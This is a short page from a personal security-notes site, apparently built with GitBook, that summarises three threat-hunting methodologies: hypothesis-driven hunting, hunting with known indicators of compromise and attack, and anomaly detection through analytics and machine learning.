CtrlK

👋Welcome !
🚩CTF Writeups
📮Room/Machine
- HTB - Sherlock
  - DFIR
    Brutus
    Unit42
    Jingle Bell
📚Notes
🛠️Tools
👽Threat Hunting
😸whoami
- About Me
- Other
  - FYP
Archives

Powered by GitBook

On this page

👽Threat Hunting

Methodologies

Hypothesis-driven

often triggered by a new threat that’s been identified through a large pool of crowdsourced attack data, giving insights into attackers’ latest TTP
threat hunters will then look to discover if the attacker’s specific behaviors are found in their own environment.

Known IOC and IOA

involves leveraging tactical threat intel to catalog known IOC and IOA
become triggers that threat hunters use to uncover potential hidden attacks or ongoing malicious activity

Advanced analytics and machine learning

combines powerful data analysis and machine learning to sift through a massive amount of information in order to detect irregularities that may suggest potential malicious activity
These anomalies become hunting leads that are investigated by skilled analysts to identify stealthy threats

Last updated 1 year ago